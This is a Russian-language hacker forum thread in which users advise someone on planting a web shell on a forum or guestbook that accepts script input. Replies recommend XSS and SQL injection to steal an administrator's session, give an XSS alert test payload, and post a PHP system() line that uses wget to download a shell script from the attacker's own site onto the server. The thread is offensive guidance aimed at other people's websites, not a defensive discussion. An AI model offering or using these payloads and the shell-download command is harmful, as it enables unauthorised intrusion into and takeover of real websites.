|
Заливка шелла
Как залить шелл, если одно из полей для ввода (допустим на каком-нибудь форуме или гостевой) пропускает определённые символы (короче можно скрипты вставлять) ?
|
Ты неправельно понял (или я тебя).
Скрипт ДОЛЖЕН загружать файлы. А если он пропускает какие-то символы, например при постинге сообщения в гостевой, то это тебе ничего не даёт, кроме xss||sql inj |
Сморя какой там скрипт:) Возможно там есть php иньекция и ты не прав тогда:)Ссылку давай поглядим так на вскидку сказать не чего не могу.
|
не думаю что в жаба скрипте буит пхп инъекция)))))))))))))
T-4 а ты введи <script>alert('Hacked by me!');</script> и наслаждайся=) |
Ссылку в студию. :]
|
Если можно вставлять скрипты, попробуй вставь скрипт, чтобы он тебе шелл залил.
|
NaX[no]r† :: " Если можно вставлять скрипты, попробуй вставь скрипт, чтобы он тебе шелл залил."
=))))) вопрос читал не))) Как залить шелл? вот код на PHP <? system("cd ../../;wget http://...../shell.php"); ?> cd ../../ - папка куда залить.. wget - качалка. взависимости еcть ли он на серве.. может быть lynx и т.д. http://...../shell.php - твой сайт с php-шеллом А впринципе если *nux знаешь сам напишешь))) |
2 [504]
Про возможность выполнения команд на сервере тут ничего не говорилось, а говорилось тут о Цитата:
Вообщем к сабжу. Как не старайся, но если скрипт пропускает какие-то символы шел никак не залить. (конечно, может быть случай когда поле "отправить коментарий" выпоняет команду на сервере, но такой случай мы не будем рассматривать) Поэтому топикСтартеру советую рулить в сторону xss || sql inj, дабы заполучить "кусочек" админа, поставить себе этот кусочек и самому стать админом, а у админа больше прав, там уже и до шела не далеко :P |
Ты бы ссылку дал мы бы конкретнее посоветовали...
Действительно проще всего сейчас sql inj и какое нить поле создать(если то что ты хакаешь такое позволяет) чат php.sbp.ru например да...И всё... |
| Время: 11:58 |